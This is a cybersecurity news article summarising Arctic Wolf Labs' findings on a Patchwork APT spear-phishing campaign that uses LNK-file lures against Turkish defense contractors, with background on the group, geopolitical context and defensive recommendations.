The advanced persistent threat (APT) group known as Patchwork has initiated a targeted cyber-espionage campaign against Turkish defense contractors, aiming to collect strategic intelligence. This operation employs a multi-stage attack sequence initiated through malicious Windows shortcut (LNK) files, which are cleverly disguised as invitations to conferences on unmanned vehicle systems.
Arctic Wolf Labs, a cybersecurity research firm, detailed this campaign in a recent technical report. The report highlights that the attack chain comprises five distinct stages, beginning with the delivery of the deceptive LNK files. These files, when executed, trigger PowerShell commands designed to retrieve additional malicious payloads from an external server. Notably, the server in question, expouav[.]org, was registered on June 25, 2025, and hosts a PDF document that mimics an international conference on unmanned vehicle systems. This document serves as a visual decoy to distract the user while the malicious processes execute in the background.
The timing and focus of this campaign suggest a geopolitical motive. It coincides with the strengthening defense collaboration between Pakistan and Türkiye, as well as recent military tensions between India and Pakistan. Given that Patchwork is believed to be an Indian state-sponsored entity, these factors indicate a strategic intent behind the cyber-attacks.
Background on Patchwork APT Group
Patchwork, also referred to by aliases such as APT-C-09, APT-Q-36, Chinastrats, Dropping Elephant, Operation Hangover, Quilted Tiger, and Zinc Emerson, has been active since at least 2009. The group is known for targeting entities in China, Pakistan, and other South Asian countries. Their operations have historically focused on cyber-espionage, aiming to gather sensitive information from government agencies, research institutions, and defense contractors.
In July 2024, the Knownsec 404 Team documented Patchwork’s activities targeting entities associated with Bhutan. The group utilized the Brute Ratel C4 framework and an updated version of a backdoor known as PGoShell in these attacks. Since early 2025, Patchwork has been linked to various campaigns against Chinese universities, employing lures related to power grids to deploy a Rust-based loader. This loader decrypts and launches a C# trojan named Protego, which is designed to harvest extensive information from compromised Windows systems.
In May 2025, Chinese cybersecurity firm QiAnXin reported infrastructure overlaps between Patchwork and another threat group known as DoNot Team (also referred to as APT-Q-38 or Bellyworm). This suggests potential operational connections between the two groups, indicating a broader network of coordinated cyber-espionage activities.
Details of the Turkish Defense Firms Campaign
The recent campaign targeting Turkish defense firms marks an expansion of Patchwork’s operational scope. The attack begins with phishing emails containing malicious LNK files. When a recipient opens the LNK file, it executes embedded PowerShell commands that initiate the download of additional payloads from the expouav[.]org domain.
The downloaded payloads include a PDF document that serves as a decoy, displaying information about a legitimate conference on unmanned vehicle systems. This tactic is designed to maintain the user’s attention while the malicious components execute in the background. One of these components is a malicious DLL file, which is launched using DLL side-loading through a scheduled task. This leads to the execution of shellcode that performs comprehensive reconnaissance of the infected system, including capturing screenshots and exfiltrating data back to the attacker’s server.
Arctic Wolf Labs notes that this campaign represents a significant evolution in Patchwork’s capabilities. The group has transitioned from using x64 DLL variants observed in November 2024 to the current x86 PE executables with enhanced command structures. This progression indicates a continuous refinement of their attack methodologies to evade detection and improve the effectiveness of their operations.
Geopolitical Context and Implications
The targeting of Turkish defense firms by Patchwork is particularly noteworthy given Türkiye’s prominent position in the global defense industry. Türkiye commands 65% of the global unmanned aerial vehicle (UAV) export market and is actively developing critical hypersonic missile capabilities. Additionally, Türkiye has been strengthening its defense ties with Pakistan during a period of heightened tensions between India and Pakistan.
These factors suggest that Patchwork’s campaign is not merely opportunistic but strategically aligned with broader geopolitical objectives. By targeting Turkish defense contractors, the group aims to gather intelligence that could influence regional power dynamics and inform national security strategies.
Recommendations for Defense Contractors
Given the sophisticated nature of Patchwork’s tactics, defense contractors and related organizations should implement robust cybersecurity measures to mitigate the risk of such attacks. Recommended actions include:
1. Employee Training and Awareness: Conduct regular training sessions to educate employees about the dangers of spear-phishing and the importance of scrutinizing unsolicited emails, especially those containing attachments or links.
2. Email Filtering and Monitoring: Deploy advanced email filtering solutions to detect and block phishing attempts. Monitor email traffic for signs of malicious activity.
3. Endpoint Protection: Utilize endpoint detection and response (EDR) solutions to identify and mitigate malicious activities on user devices.
4. Regular Software Updates: Ensure that all systems and software are up to date with the latest security patches to prevent exploitation of known vulnerabilities.
5. Network Segmentation: Implement network segmentation to limit the spread of malware within the organization.
6. Incident Response Planning: Develop and regularly update an incident response plan to ensure a swift and effective response to potential security breaches.
By adopting these measures, organizations can enhance their resilience against sophisticated cyber threats like those posed by the Patchwork APT group.
Conclusion
The recent spear-phishing campaign by Patchwork targeting Turkish defense firms underscores the evolving nature of cyber-espionage threats. The group’s use of multi-stage attack chains, deceptive lures, and advanced payloads highlights the need for continuous vigilance and proactive cybersecurity practices. As geopolitical tensions influence cyber operations, organizations in the defense sector must remain alert to the persistent and adaptive threats posed by state-sponsored actors.
